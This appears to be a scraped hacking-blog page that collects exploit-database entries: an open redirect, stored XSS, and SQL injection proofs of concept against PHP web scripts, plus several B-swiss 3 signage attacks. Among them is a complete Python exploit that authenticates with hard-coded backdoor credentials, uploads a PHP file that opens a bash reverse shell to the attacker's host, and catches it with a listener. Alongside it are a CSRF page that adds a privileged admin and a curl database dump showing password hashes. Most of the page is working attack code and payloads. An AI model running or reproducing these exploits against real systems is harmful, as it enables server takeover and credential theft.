# Exploit Title: b2evolution 6.11.6 - 'redirect_to' Open Redirect
# Date: 10/02/2021
# Exploit Author: Soham Bakore, Nakul Ratti
# Vendor Homepage: https://b2evolution.net/
# Software Link: https://b2evolution.net/downloads/6-11-6-stable?download=12405
# Version: 6.11.6
# Tested on: latest version of Chrome, Firefox on Windows and Linux
# CVE : CVE-2020-22840
--------------------------Proof of Concept-----------------------
1. Send the following link : http://127.0.0.1/htsrv/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fgoogle.com to the unsuspecting user
2. The user will be redirected to Google.com or any other attacker controlled domain
3. This can be used to perform malicious phishing campaigns on unsuspecting users
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863118288
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: b2evolution 6.11.6 - 'plugin name' Stored XSS
# Date: 09/02/2021
# Exploit Author: Soham Bakore, Nakul Ratti
# Vendor Homepage: https://b2evolution.net/
# Software Link: https://b2evolution.net/downloads/6-11-6-stable?download=12405
# Version: 6.11.6
# Tested on: latest version of Chrome, Firefox on Windows and Linux
# CVE : CVE-2020-22841
--------------------------Proof of Concept-----------------------
1. Login with an account having high privileges
2. Navigate to System -> Plugins and select any plugin
3. Change the plugin name and enter the following payload "><svg/onload=alert(123)> in the name parameter
4. Payload gets stored in the database
5. The payload gets executed after the victim checks the plugin page.
6. This vulnerability needs high privilege and can affect other users with similar privileges
# Vulnerability: B2B Script v4.27 - SQL Injection
# Date: 18.01.2017
# Software link: http://itechscripts.com/b2b-script/
# Demo: http://b2b.itechscripts.com
# Price: 199$
# Category: webapps
# Exploit Author: Dawid Morawski
# Website: http://www.morawskiweb.pl
# Contact: dawidmorawski1990@gmail.com
#######################################
1. Description
An attacker can exploit this vulnerability to read from the database.
2. SQL Injection / Proof of Concept:
http://localhost/[PATH]/search.php?keywords=[SQL]
SQLmap outout:
Parameter: keywords (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: keywords=-7908') OR 3641=3641#
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: keywords=Products') UNION ALL SELECT
NULL,CONCAT(0x716b7a7871,0x68634473486965586e6b57754358736b487a43564c6963646e556549454e476177776a5a6a7a4c4c,0x71767a7a71)#
---
[INFO] testing MySQL
[INFO] confirming MySQL
[INFO] the back-end DBMS is MySQL
#########################################
http://localhost/[PATH]/catcompany.php?token=[SQL]
SQLmap outout:
Parameter: token (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: token=7532a5bfc9e07964f8dddeb95fc584cd965d' AND 9125=9125 AND
'HhOm'='HhOm
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: token=7532a5bfc9e07964f8dddeb95fc584cd965d' AND SLEEP(5) AND
'dWKJ'='dWKJ
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: token=-7417' UNION ALL SELECT
NULL,CONCAT(0x7171707071,0x6a6c6d484f58726e48446167417a66756464445941464844416856527a634a704f4b79647a494654,0x716b786271),NULL,NULL,NULL,NULL--
aNXq
[x]========================================================================================================================================[x]
| Title : B2B Portal Script Blind SQL Vulnerabilities
| Software : B2B Portal Script
| Vendor : http://www.i-netsolution.com/
| Demo : http://www.i-netsolution.com/item/b2b-portal-script/live_demo/190275
| Date : 06 October 2016
| Author : OoN_Boy
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Technology : PHP
| Database : MySQL
| Price : $ 249
| Description : Have an idea about starting your own Alibaba clone website and thinking how to implement it? Our B2B Portal Script
is the platform to transform your idea into the practical world. It is developed in PHP and MySQL and can help global
portals to manage their online transactions with efficiency
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Exploit : http://localhost/advancedb2b/view-product.php?pid=294'
| Aadmin Page : http://localhost/[path]/admin/index.php
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Proof of concept : sqlmap -u "http://localhost/advancedb2b/view-product.php?pid=294"
[x]========================================================================================================================================[x]
---
Parameter: pid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pid=294' AND 1754=1754 AND 'whqn'='whqn
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: pid=294' AND SLEEP(5) AND 'nGqC'='nGqC
Type: UNION query
Title: Generic UNION query (NULL) - 33 columns
Payload: pid=294' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178766b71,0x656f5962547177636a47435158754754736267535a4d515a4d4c454e535052496652505243795849,0x7176626271),NULL,NULL-- lwGp
---
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Greetz : antisecurity.org batamhacker.or.id
| Vrs-hCk NoGe Jack zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va
| k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Hi All long time no see ^_^
[x]========================================================================================================================================[x]
# # # # #
# Exploit Title: B2B Marketplace Script v2.0 - SQL Injection
# Google Dork: N/A
# Date: 26.03.2017
# Vendor Homepage: http://eagletechnosys.com/
# Software: http://eaglescripts.com/php-b2b-marketplace-script-v2
# Demo: http://demob2b.xyz/
# Version: 2.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/ajax.php?section=count_classified&cl_id=[SQL]
# http://localhost/[PATH]/ajax.php?section=count_tradeleade&cl_id=[SQL]
# http://localhost/[PATH]/ajax.php?section=count_product&pro_id=[SQL]
# Etc...
# # # # #
# # # # #
# Exploit Title: B2B Alibaba Clone Script - SQL Injection
# Google Dork: N/A
# Date: 20.01.2017
# Vendor Homepage: https://www.clonescriptsoft.com/
# Software Buy: https://www.clonescriptsoft.com/collections/b2b-alibaba-clone/products/alibaba-clone
# Demo: http://alibaba.clonescriptsoft.com/
# Version: N/A
# Tested on: Win7 x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/category.php?IndustryID=[SQL]
# E.t.c....
# # # # #
SQL Injection
http://alibaba.clonescriptsoft.com/category.php?IndustryID=-1+union+select+1,2,version()
http://alibaba.clonescriptsoft.com/category.php?IndustryID=-1+union+select+1,2,group_concat(table_name)+from+information_schema.tables+where+table_schema=database()--
# Exploit Title: B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution
# Date: 2020-08-27
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.b-swiss.com
# Version: <= 3.6.5
# CVE : N/A
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# B-swiss 3 Digital Signage System 3.6.5 Backdoor Remote Code Execution
#
#
# Vendor: B-Swiss SARL | b-tween Sarl
# Product web page: https://www.b-swiss.com
# Affected version: 3.6.5
# 3.6.2
# 3.6.1
# 3.6.0
# 3.5.80
# 3.5.40
# 3.5.20
# 3.5.00
# 3.2.00
# 3.1.00
#
# Summary: Intelligent digital signage made easy. To go beyond the
# possibilities offered, b-swiss allows you to create the communication
# solution for your specific needs and your graphic charter. You benefit
# from our experience and know-how in the realization of your digital
# signage project.
#
# Desc: The application suffers from an "authenticated" arbitrary
# PHP code execution. The vulnerability is caused due to the improper
# verification of uploaded files in 'index.php' script thru the 'rec_poza'
# POST parameter. This can be exploited to execute arbitrary PHP code
# by uploading a malicious PHP script file that will be stored in
# '/usr/users' directory. Due to an undocumented and hidden "maintenance"
# account 'admin_m' which has the highest privileges in the application,
# an attacker can use these hard-coded credentials to authenticate and
# use the vulnerable image upload functionality to execute code on the
# server.
#
# ========================================================================================
# lqwrm@metalgear:~/prive$ python3 sign2.py 192.168.10.11 192.168.10.22 7777
# [*] Checking target...
# [*] Good to go!
# [*] Checking for previous attempts...
# [*] All good.
# [*] Getting backdoor session...
# [*] Got master backdoor cookie: 0c1617103c6f50107d09cb94b3eafeb2
# [*] Starting callback listener child thread
# [*] Starting handler on port 7777
# [*] Adding GUI credentials: test:123456
# [*] Executing and deleting stager file
# [*] Connection from 192.168.10.11:40080
# [*] You got shell!
# id ; uname -or
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
# 4.15.0-20-generic GNU/Linux
# exit
# *** Connection closed by remote host ***
# [?] Want me to remove the GUI credentials? y
# [*] Removing...
# [*] t00t!
# lqwrm@metalgear:~/prive$
# ========================================================================================
#
# Tested on: Linux 5.3.0-46-generic x86_64
# Linux 4.15.0-20-generic x86_64
# Linux 4.9.78-xxxx-std-ipv6-64
# Linux 4.7.0-040700-generic x86_64
# Linux 4.2.0-27-generic x86_64
# Linux 3.19.0-47-generic x86_64
# Linux 2.6.32-5-amd64 x86_64
# Darwin 17.6.0 root:xnu-4570.61.1~1 x86_64
# macOS 10.13.5
# Microsoft Windows 7 Business Edition SP1 i586
# Apache/2.4.29 (Ubuntu)
# Apache/2.4.18 (Ubuntu)
# Apache/2.4.7 (Ubuntu)
# Apache/2.2.22 (Win64)
# Apache/2.4.18 (Ubuntu)
# Apache/2.2.16 (Debian)
# PHP/7.2.24-0ubuntu0.18.04.6
# PHP/5.6.40-26+ubuntu18.04.1+deb.sury.org+1
# PHP/5.6.33-1+ubuntu16.04.1+deb.sury.org+1
# PHP/5.6.31
# PHP/5.6.30-10+deb.sury.org~xenial+2
# PHP/5.5.9-1ubuntu4.17
# PHP/5.5.9-1ubuntu4.14
# PHP/5.3.10
# PHP/5.3.13
# PHP/5.3.3-7+squeeze16
# PHP/5.3.3-7+squeeze17
# MySQL/5.5.49
# MySQL/5.5.47
# MySQL/5.5.40
# MySQL/5.5.30
# MySQL/5.1.66
# MySQL/5.1.49
# MySQL/5.0.77
# MySQL/5.0.12-dev
# MySQL/5.0.11-dev
# MySQL/5.0.8-dev
# phpMyAdmin/3.5.7
# phpMyAdmin/3.4.10.1deb1
# phpMyAdmin/3.4.7
# phpMyAdmin/3.3.7deb7
# WampServer 3.2.0
# Acore Framework 2.0
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Macedonian Information Security Research and Development Laboratory
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
#
#
# Advisory ID: ZSL-2020-5590
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5590.php
#
#
# 13.06.2020
#
from http.cookiejar import DefaultCookiePolicy# #yciloPeikooCtluafeD tropmi rajeikooc.ptth mofr
from http.cookiejar import CookieJar# oOo #raJeikooC tropmi rajeikooc.ptth mofr
from six.moves import input# #-----------------+-----------------# #tupni trompi sevom.xis morf
from time import sleep# | 01 | 04 | #peels trompi emit morf
import urllib.request# | | | | #tseuqer.billru tropmi
import urllib.parse# | | | | #esrap.billru tropmi
import telnetlib# | | | #biltenlet tropmi
import threading# | | | | #gnidaerht tropmi
import requests# | | | | #stseuqer tropmi
import socket# | | o | #tekcos tropmi
import sys,re# | | | #er,sys tropmi
############## #-----------------+-----------------# ##############
############### oOo ###############
################ | ################
#################### Y ####################
############################ _ ############################
###############################################################################################
class Sign:
def __init__(self):
self.username = b"\x61\x64\x6d\x69\x6e\x5f\x6d"
self.altruser = b"\x62\x2d\x73\x77\x69\x73\x73"
self.password = b"\x44\x50\x36\x25\x57\x33\x64"
self.agent = "SignageBot/1.02"
self.fileid = "251"
self.payload = None
self.answer = False
self.params = None
self.rhost = None
self.lhost = None
self.lport = None
self.send = None
def env(self):
if len(sys.argv) != 4:
self.usage()
else:
self.rhost = sys.argv[1]
self.lhost = sys.argv[2]
self.lport = int(sys.argv[3])
if not "http" in self.rhost:
self.rhost = "http://{}".format(self.rhost)
def usage(self):
self.roger()
print("Usage: python3 {} <RHOST[:RPORT]> <LHOST> <LPORT>".format(sys.argv[0]))
print("Example: python3 {} 192.168.10.11:80 192.168.10.22 7777\n".format(sys.argv[0]))
exit(0)
def roger(self):
waddup = """
____________________
/ \\
! B-swiss 3 !
! RCE !
\____________________/
! !
! !
L_ !
/ _)!
/ /__L
____________/ (____)
(____)
____________ (____)
\_(____)
! !
! !
\__/
"""
print(waddup)
def test(self):
print("[*] Checking target...")
try:
r = requests.get(self.rhost)
response = r.text
if not "B-swiss" in response:
print("[!] Not a b-swiss system")
exit(0)
if "B-swiss" in response:
print("[*] Good to go!")
next
else:
exit(-251)
except Exception as e:
print("[!] Ney ney: {msg}".format(msg=e))
exit(-1)
def login(self):
token = ""
cj = CookieJar()
self.params = {"locator" : "visitor.ProcessLogin",
"username" : self.username,
"password" : self.password,
"x" : "0",
"y" : "0"}
damato = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
damato.addheaders.pop()
damato.addheaders.append(("User-Agent", self.agent))
try:
print("[*] Getting backdoor session...")
damato.open(self.rhost + "/index.php", urllib.parse.urlencode(self.params).encode('utf-8'))
for cookie in cj:
token = cookie.value
print("[*] Got master backdoor cookie: "+token)
except urllib.request.URLError as e:
print("[!] Connection error: {}".format(e.reason))
return token
def upload(self):
j = "\r\n"
self.cookies = {"PNU_RAD_LIB" : self.rtoken}
self.headers = {"Cache-Control" : "max-age=0",
"Content-Type" : "multipart/form-data; boundary=----j",
"User-Agent" : self.agent,
"Accept-Encoding" : "gzip, deflate",
"Accept-Language" : "en-US,en;q=0.9",
"Connection" : "close"}
self.payload = "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/"+self.lhost+"/"+str(self.lport)+" <&1;rm "+self.fileid+".php'\");"
print("[*] Adding GUI credentials: test:123456")
# rec_adminlevel values:
# ----------------------
# 100000 - "b-swiss Maintenance Admin" (Undocumented privilege)
# 7 - "B-swiss admin" <---------------------------------------------------------------------------------------+
# 8 - Other |
# |
self.send = "------j{}Content-Disposition: form-data; ".format(j)# |
self.send += "name=\"locator\"{}Users.Save{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# |
self.send += "name=\"page\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |
self.send += "name=\"sort\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |
self.send += "name=\"id\"{}{}{}------j\r\nContent-Disposition: form-data; ".format(j*2,self.fileid,j,j)# |
self.send += "name=\"ischildgrid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |
self.send += "name=\"inpopup\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |
self.send += "name=\"ongridpage\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |
self.send += "name=\"rowid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |
self.send += "name=\"preview_screenid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |
self.send += "name=\"rec_firstname\"{}TestF{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# |
self.send += "name=\"rec_lastname\"{}TestL{}------j{}Content-Disposition: form-data; ".format(j*2,j,2)# |
self.send += "name=\"rec_email\"{}test@test.cc{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# |
self.send += "name=\"rec_username\"{}test{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# |
self.send += "name=\"rec_password\"{}123456{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# |
self.send += "name=\"rec_cpassword\"{}123456{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# |
self.send += "name=\"rec_adminlevel\"{}7{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# <----------+
self.send += "name=\"rec_status\"{}1{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
self.send += "name=\"rec_poza\"; filename=\"Blank.jpg.php\"{}Content-Type: application/octet-stream{}".format(j,j*2)
self.send += self.payload+"{}------j{}Content-Disposition: form-data; ".format(j,j)
self.send += "name=\"rec_poza_face\"{}C:\\fakepath\\Blank.jpg{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
self.send += "name=\"rec_language\"{}french-sw{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
self.send += "name=\"rec_languages[]\"{}2{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
self.send += "name=\"rec_can_change_password\"{}1{}------j--{}".format(j*2,j,j)
requests.post(self.rhost+"/index.php", headers=self.headers, cookies=self.cookies, data=self.send)
print("[*] Executing and deleting stager file")
r = requests.get(self.rhost+"/usr/users/"+self.fileid+".php")
sleep(1)
self.answer = input("[?] Want me to remove the GUI credentials? ").strip()
if self.answer[0] == "y" or self.answer[0] == "Y":
print("[*] Removing...")
requests.get(self.rhost+"/index.php?locator=Users.Delete&id="+self.fileid, headers=self.headers, cookies=self.cookies)
if self.answer[0] == "n" or self.answer[0] == "N":
print("[*] Cool!")
print("[*] t00t!")
exit(-1)
def razmisluju(self):
print("[*] Starting callback listener child thread")
konac = threading.Thread(name="ZSL", target=self.phone)
konac.start()
sleep(1)
self.upload()
def fish(self):
r = requests.get(self.rhost+"/usr/users/", verify=False, allow_redirects=False)
response = r.text
print("[*] Checking for previous attempts...")
if not ".php" in response:
print("[*] All good.")
elif "251.php" in response:
print("[!] Stager file \"{}.php\" still present on the server".format(self.fileid))
def phone(self):
telnetus = telnetlib.Telnet()
print("[*] Starting handler on port {}".format(self.lport))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", self.lport))
while True:
try:
s.settimeout(7)
s.listen(1)
conn, addr = s.accept()
print("[*] Connection from {}:{}".format(addr[0], addr[1]))
telnetus.sock = conn
except socket.timeout as p:
print("[!] No outgoing calls :( ({msg})".format(msg=p))
print("[+] Check your port mappings or increase timeout")
s.close()
exit(0)
break
print("[*] You got shell!")
telnetus.interact()
conn.close()
def main(self):
self.env()
self.test()
self.fish()
self.rtoken = self.login()
self.razmisluju()
if __name__ == '__main__':
Sign().main()
# Exploit Title: B-swiss 3 Digital Signage System 3.6.5 - Cross-Site Request Forgery (Add Maintenance Admin)
# Date: 2020-09-16
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.b-swiss.com
# Version: 3.6.5
Affected version: 3.6.5,3.6.2,3.6.1,3.6.0,3.5.80,3.5.40,3.5.20,3.5.00,3.2.00,3.1.00
<!--
B-swiss 3 Digital Signage System 3.6.5 CSRF Add Maintenance Admin
Vendor: B-Swiss SARL | b-tween Sarl
Product web page: https://www.b-swiss.com
Affected version: 3.6.5
3.6.2
3.6.1
3.6.0
3.5.80
3.5.40
3.5.20
3.5.00
3.2.00
3.1.00
Summary: Intelligent digital signage made easy. To go beyond the
possibilities offered, b-swiss allows you to create the communication
solution for your specific needs and your graphic charter. You benefit
from our experience and know-how in the realization of your digital
signage project.
Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.
Tested on: Linux 5.3.0-46-generic x86_64
Linux 4.15.0-20-generic x86_64
Linux 4.9.78-xxxx-std-ipv6-64
Linux 4.7.0-040700-generic x86_64
Linux 4.2.0-27-generic x86_64
Linux 3.19.0-47-generic x86_64
Linux 2.6.32-5-amd64 x86_64
Darwin 17.6.0 root:xnu-4570.61.1~1 x86_64
macOS 10.13.5
Microsoft Windows 7 Business Edition SP1 i586
Apache/2.4.29 (Ubuntu)
Apache/2.4.18 (Ubuntu)
Apache/2.4.7 (Ubuntu)
Apache/2.2.22 (Win64)
Apache/2.4.18 (Ubuntu)
Apache/2.2.16 (Debian)
PHP/7.2.24-0ubuntu0.18.04.6
PHP/5.6.40-26+ubuntu18.04.1+deb.sury.org+1
PHP/5.6.33-1+ubuntu16.04.1+deb.sury.org+1
PHP/5.6.31
PHP/5.6.30-10+deb.sury.org~xenial+2
PHP/5.5.9-1ubuntu4.17
PHP/5.5.9-1ubuntu4.14
PHP/5.3.10
PHP/5.3.13
PHP/5.3.3-7+squeeze16
PHP/5.3.3-7+squeeze17
MySQL/5.5.49
MySQL/5.5.47
MySQL/5.5.40
MySQL/5.5.30
MySQL/5.1.66
MySQL/5.1.49
MySQL/5.0.77
MySQL/5.0.12-dev
MySQL/5.0.11-dev
MySQL/5.0.8-dev
phpMyAdmin/3.5.7
phpMyAdmin/3.4.10.1deb1
phpMyAdmin/3.4.7
phpMyAdmin/3.3.7deb7
WampServer 3.2.0
Acore Framework 2.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2020-5589
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5589.php
13.06.2020
-->
<html>
<body>
<h1>CSRF Add b-swiss Maintenance Admin</h1>
<script>
function GodMode()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/192.168.10.11\/index.php", true);
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryfH6TtIgiA4Qhr6Ed");
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9");
xhr.withCredentials = true;
var body = "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"locator\"\r\n" +
"\r\n" +
"Users.Save\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"page\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"sort\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"id\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"ischildgrid\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"inpopup\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"ongridpage\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rowid\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"preview_screenid\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rec_firstname\"\r\n" +
"\r\n" +
"TestingusF\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rec_lastname\"\r\n" +
"\r\n" +
"TestingusL\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rec_email\"\r\n" +
"\r\n" +
"aa@bb.cc\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rec_username\"\r\n" +
"\r\n" +
"testingus\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rec_password\"\r\n" +
"\r\n" +
"123456\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rec_cpassword\"\r\n" +
"\r\n" +
"123456\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rec_adminlevel\"\r\n" +
"\r\n" +
"100000\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rec_status\"\r\n" +
"\r\n" +
"1\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rec_poza\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rec_poza_face\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rec_language\"\r\n" +
"\r\n" +
"french-sw\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rec_languages[]\"\r\n" +
"\r\n" +
"2\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rec_can_change_password\"\r\n" +
"\r\n" +
"1\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Press me" onclick="GodMode();" />
</form>
</body>
</html>
# Exploit Title: B-swiss 3 Digital Signage System 3.6.5 - Database Disclosure
# Date: 2020-09-16
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.b-swiss.com
# Version: 3.6.5
# Affected version: 3.6.5,3.6.2,3.6.1,3.6.0,3.5.80,3.5.40,3.5.20,3.5.00,3.2.00,3.1.00
B-swiss 3 Digital Signage System 3.6.5 Database Disclosure
Vendor: B-Swiss SARL | b-tween Sarl
Product web page: https://www.b-swiss.com
Affected version: 3.6.5
3.6.2
3.6.1
3.6.0
3.5.80
3.5.40
3.5.20
3.5.00
3.2.00
3.1.00
Summary: Intelligent digital signage made easy. To go beyond the
possibilities offered, b-swiss allows you to create the communication
solution for your specific needs and your graphic charter. You benefit
from our experience and know-how in the realization of your digital
signage project.
Desc: The application is vulnerable to unauthenticated database download
and information disclosure vulnerability. This can enable the attacker to
disclose sensitive information resulting in authentication bypass, session
hijacking and full system control.
Tested on: Linux 5.3.0-46-generic x86_64
Linux 4.15.0-20-generic x86_64
Linux 4.9.78-xxxx-std-ipv6-64
Linux 4.7.0-040700-generic x86_64
Linux 4.2.0-27-generic x86_64
Linux 3.19.0-47-generic x86_64
Linux 2.6.32-5-amd64 x86_64
Darwin 17.6.0 root:xnu-4570.61.1~1 x86_64
macOS 10.13.5
Microsoft Windows 7 Business Edition SP1 i586
Apache/2.4.29 (Ubuntu)
Apache/2.4.18 (Ubuntu)
Apache/2.4.7 (Ubuntu)
Apache/2.2.22 (Win64)
Apache/2.4.18 (Ubuntu)
Apache/2.2.16 (Debian)
PHP/7.2.24-0ubuntu0.18.04.6
PHP/5.6.40-26+ubuntu18.04.1+deb.sury.org+1
PHP/5.6.33-1+ubuntu16.04.1+deb.sury.org+1
PHP/5.6.31
PHP/5.6.30-10+deb.sury.org~xenial+2
PHP/5.5.9-1ubuntu4.17
PHP/5.5.9-1ubuntu4.14
PHP/5.3.10
PHP/5.3.13
PHP/5.3.3-7+squeeze16
PHP/5.3.3-7+squeeze17
MySQL/5.5.49
MySQL/5.5.47
MySQL/5.5.40
MySQL/5.5.30
MySQL/5.1.66
MySQL/5.1.49
MySQL/5.0.77
MySQL/5.0.12-dev
MySQL/5.0.11-dev
MySQL/5.0.8-dev
phpMyAdmin/3.5.7
phpMyAdmin/3.4.10.1deb1
phpMyAdmin/3.4.7
phpMyAdmin/3.3.7deb7
WampServer 3.2.0
Acore Framework 2.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2020-5588
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5588.php
13.06.2020
--
$ curl -s http://192.168.10.11/bswiss3.sql |grep admin_m -B1 -A4
INSERT INTO `users` (`id`, `created_by`, `created_by_adminlevelid`, `firstname`, `lastname`, `email`, `username`, `password`, `adminlevel`, `status`, `language`, `creationdate`, `receives_validation_alerts`, `can_change_password`) VALUES
(1, 0, 0, 'Dusko', 'Dolgousko', 'duki@looney.tunes', 'admin_m', '999f311dd5bd2b83ea849229a8906b29', 100000, 1, 'french-sw', '0000-00-00 00:00:00', 1, 0),
(3, 2, 7, 'b-swiss', ' ', ' ', 'b-swiss', '999f311dd5bd2b83ea849229a8906b29', 7, 1, 'french-sw', '2020-06-27 16:28:30', 0, 1),
(13, 3, 7, 'Admin', ' ', ' ', 'admin', '21232f297a57a5a743894a0e4a801fc3', 24, 1, 'french-sw', '2020-07-26 17:48:16', 0, 1),
(14, 13, 24, 'User', ' ', ' ', 'User', 'ee11cbb19052e40b07aac0ca060c23ee', 26, 1, 'french-sw', '2020-07-27 14:26:35', 0, 1),
(18, 13, 24, 'Test', ' ', ' ', 'test', '81dc9bdb52d04dc20036dbd8313ed055', 29, 1, 'french-sw', '2020-07-27 14:30:07', 0, 1);
